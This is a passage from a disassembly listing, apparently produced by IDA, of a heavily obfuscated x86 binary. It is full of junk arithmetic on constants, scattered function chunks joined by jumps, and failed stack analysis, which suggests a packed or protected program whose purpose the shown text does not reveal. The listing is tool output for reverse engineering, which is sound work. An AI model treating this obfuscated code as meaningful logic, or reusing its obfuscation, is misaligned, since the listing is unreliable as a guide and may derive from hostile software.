loc_44F0FD:				; CODE XREF: y2kk37jd:loc_44C333j
		add	edi, ebp
		add	edi, 0D4ADF1CFh
		mov	edi, [edi]
		cmp	eax, edi
		pop	edi
		jnz	loc_4542AF
		jmp	loc_455ECD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4567FD

loc_44F115:				; CODE XREF: sub_4567FD:loc_448C26j
		jns	sub_4508C4
		add	esp, 0FFFFFFECh
		mov	eax, offset dword_449C20
		call	sub_443688
		cmp	ds:dword_449C24, 0
		jnz	loc_44DB5E
		lea	edx, [ebp-14h]
		mov	eax, offset dword_449C28
		jmp	loc_44CE45
; END OF FUNCTION CHUNK	FOR sub_4567FD

; =============== S U B	R O U T	I N E =======================================



sub_44F142	proc near		; CODE XREF: y2kk37jd:004419F3j
					; sub_43B2EB:loc_447637p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044413C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044AF7F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FAC9 SIZE 00000008 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	0DEF6E4A0h
		pop	esi
		sub	esi, 0C81C2964h
		jmp	loc_44AF7F
sub_44F142	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455677

loc_44F157:				; CODE XREF: sub_455677+1Aj
		sub	ecx, 3C69B6A5h
		xor	ecx, 0DE21E206h
		add	ecx, 866E246Dh
		xchg	ecx, [esp+4+var_4]

loc_44F16C:				; CODE XREF: y2kk37jd:00441A3Cj
		jmp	loc_43DE7C
; END OF FUNCTION CHUNK	FOR sub_455677
; ---------------------------------------------------------------------------

loc_44F171:				; CODE XREF: y2kk37jd:loc_459B54j
		jnz	loc_459D75
		jmp	loc_456D14
; ---------------------------------------------------------------------------
		cdq
		pop	ebp
		jmp	sub_447166
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44F183:				; CODE XREF: sub_445226+86E1j
		push	edi

loc_44F184:				; CODE XREF: y2kk37jd:loc_4503E1j
		rol	ecx, 1Ch
		pop	edx

loc_44F188:				; CODE XREF: sub_445226:loc_446D6Fj
		push	eax
		lea	eax, dword_440320
		push	edx
		mov	edx, eax
		xchg	edx, [esp+0]
		jmp	loc_44D194
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	ebx, [eax]
		jmp	sub_4492F7
; ---------------------------------------------------------------------------

loc_44F1A1:				; DATA XREF: sub_44B47E+23EBo
		push	edi
		push	2BBDC615h
		pop	edi
		or	edi, 0B2CCDE79h
		test	edi, 200000h
		jmp	loc_44C942
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_86. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_44F1BA:				; CODE XREF: sub_43ED86:loc_4436DDj
		or	ebx, 5E9A8581h
		and	ebx, 2CF70CADh
		sub	ebx, 35418536h

loc_44F1CC:				; CODE XREF: sub_445226:loc_458B4Fj
		xor	ebx, 9A962E24h
		add	eax, ebx
		pop	ebx
		jmp	loc_450835
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E9F

loc_44F1DA:				; CODE XREF: sub_451E9F:loc_4426EFj
		mov	[ebp-20h], eax
		jmp	loc_4441E9
; END OF FUNCTION CHUNK	FOR sub_451E9F

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44F1E2	proc near		; CODE XREF: sub_451E9F+4p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F3E3 SIZE 00000010 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp+var_4], eax
		jmp	loc_43F3E3
sub_44F1E2	endp

; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EAA2

loc_44F1F1:				; CODE XREF: sub_44EAA2+6j
		ror	eax, 7
		sub	eax, 0E090501Eh
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		call	sub_446819
		jmp	loc_4400E7
; END OF FUNCTION CHUNK	FOR sub_44EAA2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44F20A:				; CODE XREF: sub_4458DD:loc_446762j
		or	edx, 3689ACEFh
		and	edx, 67534670h
		add	edx, 0FE9B9A55h
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+4+var_4]
		jmp	loc_4532A7
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B489

loc_44F227:				; CODE XREF: sub_44B489:loc_44ED1Cj
		sub	esi, 0E7F0FE15h
		xor	esi, 32A760A6h
		test	eax, esi
		pop	esi
		jz	loc_457EF2
		jmp	loc_43DE65
; END OF FUNCTION CHUNK	FOR sub_44B489
; ---------------------------------------------------------------------------

loc_44F241:				; CODE XREF: y2kk37jd:0043E9B2j
		jl	loc_451ABD
		sub	edx, 0C8526D49h
		cmp	ebx, 84F68739h
		jmp	loc_451543
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444899

loc_44F258:				; CODE XREF: sub_444899-4037j
		add	edi, 91B343B4h
		xor	edi, 54CD7D9Fh

loc_44F264:				; CODE XREF: sub_440337:loc_446C33j
		add	edi, 0E4913C14h
		xchg	edi, [esp+0Ch+var_C]
		jmp	loc_459EB1
; END OF FUNCTION CHUNK	FOR sub_444899
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_44F272:				; CODE XREF: sub_442DDC+1246Bj
		xchg	ebp, [esp+0]
		mov	eax, edx
		call	sub_4448E2
		mov	eax, [esp+0]
		call	sub_4526B7
		jmp	nullsub_160
; END OF FUNCTION CHUNK	FOR sub_442DDC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_450. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455556

loc_44F28A:				; CODE XREF: sub_455556:loc_4410B5j
		ja	loc_45B42C
		jmp	loc_458FAD
; END OF FUNCTION CHUNK	FOR sub_455556
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A45E

loc_44F295:				; CODE XREF: sub_45A45E-7B2Ej
		sub	edx, ecx
		cmp	eax, edi
		jmp	loc_45AA71
; END OF FUNCTION CHUNK	FOR sub_45A45E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_44F29E:				; CODE XREF: sub_44113A:loc_449815j
		add	ebx, edx
; END OF FUNCTION CHUNK	FOR sub_44113A

; =============== S U B	R O U T	I N E =======================================



sub_44F2A0	proc near		; CODE XREF: sub_458101-19A3Fp
		xchg	ebx, [esp+0]
		pop	ebx
		mov	[edx], eax

loc_44F2A6:				; CODE XREF: y2kk37jd:loc_4415B3j
					; sub_43F8B8+3587j ...
		add	dword ptr [ebp-18h], 4
		inc	dword ptr [ebp-20h]
		dec	dword ptr [ebp-2Ch]
		jnz	loc_457C3D
		jmp	loc_4420E7
sub_44F2A0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D3EB

loc_44F2BB:				; CODE XREF: sub_43D3EB+8j
		mov	edx, [ebp-18h]
		shr	edx, 3
		mov	ecx, ds:dword_4516B8
		or	[ecx+edx], al
		push	304669Fh
		pop	ecx
		or	ecx, 4D348453h
		add	ecx, ds:4000EAh
		jmp	loc_459A1B
; END OF FUNCTION CHUNK	FOR sub_43D3EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448770

loc_44F2E1:				; CODE XREF: sub_448770-1EEj
		rol	ecx, 1Dh
		add	edx, 55C9A6DBh
		mov	edx, [eax]
; END OF FUNCTION CHUNK	FOR sub_448770
; START	OF FUNCTION CHUNK FOR sub_447F91

loc_44F2EC:				; CODE XREF: sub_447F91-B3F6j
					; sub_44B0D0-E252j ...
		jmp	loc_45AD3C
; END OF FUNCTION CHUNK	FOR sub_447F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448770

loc_44F2F1:				; CODE XREF: sub_44B0D0-F602j
					; sub_448770+11j
		xchg	ebx, [esp-4+arg_0]
		mov	ecx, ebx
		jmp	loc_44C4F8
; END OF FUNCTION CHUNK	FOR sub_448770

; =============== S U B	R O U T	I N E =======================================



sub_44F2FB	proc near		; DATA XREF: sub_4479FB+12o
		dec	dword ptr [ebp-18h]
		jnz	loc_453900
		jmp	loc_445675
sub_44F2FB	endp


; =============== S U B	R O U T	I N E =======================================



sub_44F309	proc near		; DATA XREF: y2kk37jd:004471A3o

; FUNCTION CHUNK AT 00451ACB SIZE 00000012 BYTES

		call	sub_43BA66
		or	eax, eax
		jnz	loc_451ACB
		jmp	loc_44E730
sub_44F309	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DD0E

loc_44F31B:				; CODE XREF: sub_43DD0E+11799j
		rol	eax, 12h
		push	eax
		call	sub_4526B7
		retn
; END OF FUNCTION CHUNK	FOR sub_43DD0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EEC8

loc_44F325:				; CODE XREF: sub_44EEC8+D203j
		jmp	loc_449706
; END OF FUNCTION CHUNK	FOR sub_44EEC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_44F32A:				; CODE XREF: sub_446861+1194Aj
		jmp	loc_459FF4
; END OF FUNCTION CHUNK	FOR sub_446861
; ---------------------------------------------------------------------------

loc_44F32F:				; CODE XREF: y2kk37jd:0044B279j
		jmp	loc_45BD6E

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44F334	proc near		; DATA XREF: sub_453B38:loc_45378Eo
					; y2kk37jd:0045A80Fo

var_2CC		= dword	ptr -2CCh
var_C		= byte ptr -0Ch

; FUNCTION CHUNK AT 0043F7C5 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004516C1 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFD38h
		lea	eax, [ebp+var_C]
		jmp	loc_43F7C5
sub_44F334	endp

; ---------------------------------------------------------------------------

loc_44F345:				; CODE XREF: y2kk37jd:loc_4442A9j
		jnz	loc_44ADBA
; START	OF FUNCTION CHUNK FOR sub_45447D

loc_44F34B:				; CODE XREF: sub_45447D-10DC7j
					; sub_4564EB+4B59j
		jmp	loc_4510A7
; END OF FUNCTION CHUNK	FOR sub_45447D
; ---------------------------------------------------------------------------
		add	ecx, edi
		ror	eax, 13h

loc_44F355:				; CODE XREF: y2kk37jd:00441E98j
		pushf
		xor	ecx, ebx
		jmp	loc_44ADBA
; ---------------------------------------------------------------------------
		push	0EFCD1DCEh
		pop	eax
		rol	eax, 9
		or	eax, 79070FF6h
		xor	eax, 0DB0577AEh
		call	sub_4562BD
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44F377:				; CODE XREF: sub_453867+389Cj
		jmp	loc_449DF7
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

loc_44F37C:				; CODE XREF: sub_446718+14j
		jmp	loc_450FB2
; END OF FUNCTION CHUNK	FOR sub_446718
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490CB

loc_44F381:				; CODE XREF: sub_4490CB:loc_456C01j
		mov	edx, ecx
		xchg	edx, [esp+4+var_4]
		call	sub_44AA4A
; END OF FUNCTION CHUNK	FOR sub_4490CB
; START	OF FUNCTION CHUNK FOR sub_448C53

loc_44F38B:				; CODE XREF: sub_448C53+8001j
		add	edi, 0E69056C4h
		shr	esi, 13h

loc_44F394:				; CODE XREF: sub_453867:loc_4488FCj
		push	offset sub_44A8B6
		jmp	loc_43FA6A
; END OF FUNCTION CHUNK	FOR sub_448C53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB8B

loc_44F39E:				; CODE XREF: sub_44CB8B+DD42j
		pop	ebx
		mov	eax, [esp-4+arg_0]
		push	edx
; END OF FUNCTION CHUNK	FOR sub_44CB8B
; START	OF FUNCTION CHUNK FOR sub_452E72

loc_44F3A3:				; CODE XREF: sub_452E72+2j
		call	sub_44F3F5
		jmp	loc_45AF5F
; END OF FUNCTION CHUNK	FOR sub_452E72
; ---------------------------------------------------------------------------
		db 3Bh,	0EAh, 0E9h
		dd 0FFFEBF98h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4487FD

loc_44F3B4:				; CODE XREF: sub_4487FD+3j
		xchg	ecx, [esp+4+var_4]
		mov	ebp, esp
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+8+var_8]
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		jmp	loc_4514FE
; END OF FUNCTION CHUNK	FOR sub_4487FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_44F3CA:				; CODE XREF: sub_4477A2:loc_4405E4j
		pop	eax
		or	eax, 43D62917h
		cmp	eax, 0E8BDB120h
		jmp	loc_443211
; END OF FUNCTION CHUNK	FOR sub_4477A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44F3DC:				; CODE XREF: sub_43F75D:loc_44C64Fj
		jnz	loc_4544DC
		ja	nullsub_289
		jmp	loc_4544D2
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442EB4

loc_44F3ED:				; CODE XREF: sub_442EB4+7j
					; sub_44AAA1+8054j ...
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_442EB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440FDF

loc_44F3F0:				; CODE XREF: sub_440FDF+133FBj
		jmp	nullsub_456
; END OF FUNCTION CHUNK	FOR sub_440FDF

; =============== S U B	R O U T	I N E =======================================



sub_44F3F5	proc near		; CODE XREF: sub_43BD0D+Bp
					; sub_452251:loc_444AE9j ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B81F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DD06 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00441BF8 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00445C6A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004473FA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044A673 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044B864 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044C0AB SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044E5DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045116B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004525E7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452D5F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004562B2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458CBF SIZE 00000005 BYTES

		jno	sub_450618
		push	ebp
		mov	ebp, esp
		call	sub_453778

loc_44F403:				; CODE XREF: sub_44C88E+1j
		jmp	loc_4525E7
sub_44F3F5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_44F408:				; CODE XREF: sub_45689F:loc_44571Aj
		jz	loc_43F8C7
		push	eax
		jmp	loc_43F8C6
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

locret_44F414:				; CODE XREF: y2kk37jd:loc_443AF8j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_44F415:				; CODE XREF: sub_43C7B9+1j
		jmp	loc_43E5DB
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A05D

loc_44F41A:				; CODE XREF: sub_45A05D:loc_455178j
		push	esi
		push	0F24190FAh
		pop	esi
		or	esi, 3B361636h
		js	loc_458C91

loc_44F42D:				; CODE XREF: sub_44619E+C0FDj
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_45A05D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_44F432:				; CODE XREF: sub_43B163+8DA1j
		jmp	nullsub_260
; END OF FUNCTION CHUNK	FOR sub_43B163
; ---------------------------------------------------------------------------
		shr	edi, 19h
		adc	ecx, eax
		jl	sub_43ED86
		jmp	loc_458C8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_44F447:				; CODE XREF: sub_44CDD5:loc_4445FFj
		mov	[ebp-8], eax
		jmp	loc_447348
; END OF FUNCTION CHUNK	FOR sub_44CDD5

; =============== S U B	R O U T	I N E =======================================



sub_44F44F	proc near		; CODE XREF: sub_44572F+3j

; FUNCTION CHUNK AT 0043FD8C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045107C SIZE 00000005 BYTES

		add	esp, 0FFFFFFD0h
		push	0C5DC92D7h
		pop	eax
		xor	eax, 0ACA205Bh
		jmp	loc_43FD8C
sub_44F44F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44F463:				; CODE XREF: sub_43F8B8-28D0j
		jb	loc_4591A9
		cmp	ecx, ebx
		jmp	loc_4439AC
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44F470:				; CODE XREF: sub_43F911:loc_43B290j
					; y2kk37jd:0043F41Cj
		xor	ecx, 0E61E97F6h
		add	ecx, 69D28B64h
		xchg	ecx, [esp+0]
		jmp	loc_454874
; END OF FUNCTION CHUNK	FOR sub_43F911

; =============== S U B	R O U T	I N E =======================================



sub_44F484	proc near		; DATA XREF: sub_44B814:loc_453A7Co
		push	8D69AB2Dh
		pop	eax
		sub	eax, 4C568DF4h
		add	eax, 50312BEDh
		add	eax, ebp
		push	edi
		push	offset sub_43E679
		jmp	nullsub_323
sub_44F484	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DD0E

loc_44F4A3:				; CODE XREF: sub_43DD0E:loc_43E734j
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_44F31B
		jmp	loc_44595B
; END OF FUNCTION CHUNK	FOR sub_43DD0E
; ---------------------------------------------------------------------------

locret_44F4B2:				; CODE XREF: y2kk37jd:0043B09Aj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44F4B3:				; CODE XREF: sub_43F911+1BF7j
		jmp	nullsub_202
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562BD

loc_44F4B8:				; CODE XREF: sub_4562BD+18j
		call	sub_452ABB
; END OF FUNCTION CHUNK	FOR sub_4562BD
; START	OF FUNCTION CHUNK FOR sub_459672

loc_44F4BD:				; CODE XREF: sub_459672+7j
		jmp	loc_443121
; END OF FUNCTION CHUNK	FOR sub_459672
; ---------------------------------------------------------------------------

loc_44F4C2:				; CODE XREF: y2kk37jd:004455EDj
		js	loc_44ED9D
		sub	ebp, 0BD1C33A9h
		mov	ebp, 3E8B292h
		jmp	loc_43B3FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_44F4D8:				; CODE XREF: sub_4429DD+F262j
		push	eax
		call	sub_43BA66
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jnz	loc_44D4CA
		jmp	loc_4528A2
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459789

loc_44F4F0:				; CODE XREF: sub_459789:loc_44DA3Fj
		call	sub_440CD1
		retn
; END OF FUNCTION CHUNK	FOR sub_459789
; ---------------------------------------------------------------------------
		dw 43CAh
dword_44F4F8	dd 0			; DATA XREF: sub_44F309+27CEw
; ---------------------------------------------------------------------------

loc_44F4FC:				; CODE XREF: y2kk37jd:00456181j
		jmp	loc_45C052
; ---------------------------------------------------------------------------
		db 0A1h, 1, 23h
dword_44F504	dd 621521D4h, 8B32CC26h, 0B1B123h ; DATA XREF: sub_448526+6o
					; sub_443AA7+168A8o
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44F510:				; CODE XREF: sub_4458DD+Cj
		jmp	loc_44895E
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		jnz	loc_440E96
		jmp	loc_446233
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6B0

loc_44F520:				; CODE XREF: sub_44D6B0+9j
		jz	loc_445B62
		jmp	loc_45B88E
; END OF FUNCTION CHUNK	FOR sub_44D6B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B4EE

loc_44F52B:				; CODE XREF: sub_43B4EE:loc_4496BBj
		jz	loc_4587A0
		jmp	loc_45B829
; END OF FUNCTION CHUNK	FOR sub_43B4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44F536:				; CODE XREF: sub_445226+15D7Fj
		jnp	loc_43C0E5
		popf
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_44F53D:				; CODE XREF: sub_43E679:loc_441AC7j
					; y2kk37jd:00445D9Bj ...
		push	60D9B194h
		pop	ecx
		and	ecx, 79E3815Eh
		jnz	loc_453629

loc_44F54F:				; CODE XREF: y2kk37jd:0045BF84j
		jmp	nullsub_172
; END OF FUNCTION CHUNK	FOR sub_455B08
; ---------------------------------------------------------------------------

loc_44F554:				; CODE XREF: y2kk37jd:0045819Aj
		jmp	loc_44AFFC
; ---------------------------------------------------------------------------
		db 0C1h, 0E5h, 19h
		dd 0FFE81EE9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_44F561:				; CODE XREF: sub_4577FE-189C1j
		mov	ebx, 75DBAA3Ah

loc_44F566:				; CODE XREF: sub_4577FE:loc_454C19j
		push	0
		push	0
		push	0FFFFFFFFh
		push	ecx
		push	0F1B1451Fh
		pop	ecx
		jmp	loc_441726
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------

loc_44F578:				; CODE XREF: y2kk37jd:loc_43C6A9j
		pop	ebp
		or	ebx, 0C94086BEh
		add	ebx, 6DD1D8Fh
		xchg	ebx, [esp]
		jmp	sub_441718
; ---------------------------------------------------------------------------
		push	0B0EDA8D2h
		pop	eax
		jmp	loc_43FD87
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_44F598:				; CODE XREF: sub_43ED19+81A8j
		or	edi, eax

loc_44F59A:				; CODE XREF: sub_43ED19:loc_43FF29j
		call	sub_44DBF8

loc_44F59F:				; CODE XREF: sub_43ED19:loc_43EA51j
		add	eax, 0E1C2DF0Eh
		xor	eax, 0D90EA0EBh
		add	eax, ebp
		push	ebx
		call	sub_45136B

loc_44F5B3:				; CODE XREF: sub_44113A+C4C7j
		pop	eax
		or	eax, 15A2C053h
		xor	eax, 251D5279h
		add	eax, 423D93CCh
		add	eax, ebp
		add	eax, 0A4D7E392h
		mov	eax, [eax]
		test	dword ptr [eax], 0FFFF0000h
		jmp	loc_4437D8
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456890

loc_44F5DB:				; CODE XREF: sub_456890+4AE1j
		xor	edx, 0B041C04h
		xchg	edx, [esp+0]
		push	15F3386Dh
		pop	eax
		jmp	loc_4555E5
; END OF FUNCTION CHUNK	FOR sub_456890
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D39B

loc_44F5EF:				; CODE XREF: sub_44D39B+Cj
		or	eax, 1684B439h
		and	eax, ds:4000E9h
		xor	eax, 653014CDh
		rol	eax, 0Ch
		add	eax, 0DEE611EBh
		jmp	loc_445CAC
; END OF FUNCTION CHUNK	FOR sub_44D39B

; =============== S U B	R O U T	I N E =======================================



sub_44F60F	proc near		; DATA XREF: y2kk37jd:0045B87Eo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441F26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CEEF SIZE 0000000E BYTES

		push	eax
		push	0AAD68A27h
		pop	eax
		xor	eax, 9CFAB55h
		rol	eax, 0Bh
		jmp	loc_441F26
sub_44F60F	endp

; ---------------------------------------------------------------------------

loc_44F624:				; DATA XREF: sub_447D0B+10010o
		or	eax, eax
		jnz	loc_446A42
		jmp	loc_458D57
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E110

loc_44F631:				; CODE XREF: sub_43E110+5j
		jmp	ds:off_41E088
; END OF FUNCTION CHUNK	FOR sub_43E110
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_44F637:				; CODE XREF: sub_43B0F5+205C4j
		jmp	loc_44C111
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451854

loc_44F63C:				; CODE XREF: sub_451854:loc_451857j
		jmp	loc_45C47A
; END OF FUNCTION CHUNK	FOR sub_451854

; =============== S U B	R O U T	I N E =======================================



sub_44F641	proc near		; CODE XREF: sub_43E110p
					; y2kk37jd:004445C2j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D3DC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043FF34 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044C709 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004510EA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004512FF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004542D7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004561FF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00456A59 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457012 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457891 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00458B0C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458C71 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0045A7BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AC81 SIZE 00000005 BYTES

		pop	edx
		jz	loc_4542D7
		mov	eax, [esp+0]
		push	edx
		call	sub_45AC8D

loc_44F651:				; CODE XREF: sub_44426A+14B63j
		jmp	loc_4510EA
sub_44F641	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44F656:				; CODE XREF: y2kk37jd:0043D50Dj
		jmp	locret_444E7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D39B

loc_44F65B:				; CODE XREF: sub_44D39B:loc_445CACj
		call	sub_452251
; END OF FUNCTION CHUNK	FOR sub_44D39B
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_44F660:				; CODE XREF: sub_44CDD5+15j
		jmp	loc_44FB82
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B79D

loc_44F665:				; CODE XREF: y2kk37jd:0044A9DBj
					; sub_44B79D+FF4Cj
		jmp	loc_44B5A2
; END OF FUNCTION CHUNK	FOR sub_44B79D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_44F66A:				; CODE XREF: sub_43ED19+3AB7j
		jmp	loc_45ADC3
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44023C

loc_44F66F:				; CODE XREF: sub_44023C+Aj
		mov	eax, esp
		push	0
		mov	edx, esp
		push	edx
		push	0
		jmp	loc_43B3BE
; END OF FUNCTION CHUNK	FOR sub_44023C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448797

loc_44F67D:				; CODE XREF: sub_448797:loc_4477EFj
		ror	ebx, 11h
		jmp	loc_4565AB
; END OF FUNCTION CHUNK	FOR sub_448797
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444A65

loc_44F685:				; CODE XREF: sub_444A65:loc_4574ADj
		xchg	ecx, [esp+4+var_4]
		jmp	loc_44660C
; END OF FUNCTION CHUNK	FOR sub_444A65

; =============== S U B	R O U T	I N E =======================================



sub_44F68D	proc near		; CODE XREF: y2kk37jd:00444683p
					; y2kk37jd:00454C3Ej

var_4		= dword	ptr -4

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_440CD1
		push	eax
		ror	eax, 12h
		push	ebx
		mov	ebx, esi
		xchg	ebx, [esp+4+var_4]
sub_44F68D	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_44F6A0:				; CODE XREF: sub_4553C1:loc_447FA8j
		jmp	loc_4530FE
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------
		mov	eax, 201E933Eh
		call	sub_442C3E
		mov	ds:off_41E0D4, eax
		push	offset sub_4497DA
		jmp	loc_44FB1C
